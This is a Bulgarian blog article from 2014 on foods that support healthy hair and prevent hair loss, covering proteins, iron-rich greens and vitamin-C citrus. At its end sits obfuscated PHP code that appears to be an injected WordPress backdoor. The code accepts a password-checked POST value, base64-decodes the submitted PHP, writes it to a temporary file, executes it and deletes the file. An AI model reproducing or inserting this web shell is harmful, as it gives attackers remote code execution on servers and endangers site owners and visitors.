Храни за здрава коса и срещу косопад | Косопад

Храни за здрава коса и срещу косопад

Здравата и красива коса е резултат от балансираното хранене. Недостига на хранителни вещества причиняват проблеми с изсушаването, липса на блясък, силен косопад и пърхот. Ако забелязвате някой от следните проблеми, прегледайте менюто си. Стремете се да приемате:

proteini-kosa

ХРАНИ БОГАТИ НА ПРОТЕИНИ

Основната съставка на косата са протеините, затова трябва задължително да приемаме достатъчно от тях. Когато косата е суха, чуплива и слаба, трябва да ядете повече протеини. Храненето, в което недостига протеини, причинява косопад и забавя растежа на косата. Задължителните храни са: месо, риба, яйца, млечни продукти. Ако сте вегетарианци, наблегнете на бобовите и орехите.

proteini-kosa-1

ЗЕЛЕНИ ЗЕЛЕНЧУЦИ

Анемията е основен причинител на косопад и се появява, когато не ни достига желязо. Косменият корен се храни с вещества от кръвта. Ако коренът не получава достатъчно желязо, косата спира да расте и става слаба. Така се улеснява падането й. Подходящите продукти за получаване на това вещество са: маруля, броколи, спанак и зелено цвекло.

ЦИТРУСИ

Тъй като желязото е толкова необходимо за здравата коса, витамин С винаги трябва да присъства в диетата ни. Този витамин улеснява усвояването на желязо, както и производството на колаген. Едни от най- богатите на витамин С плодове са: лимон, портокал, мандарина, грейпфрут, киви.

12. ноември 2014 16:03:19 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}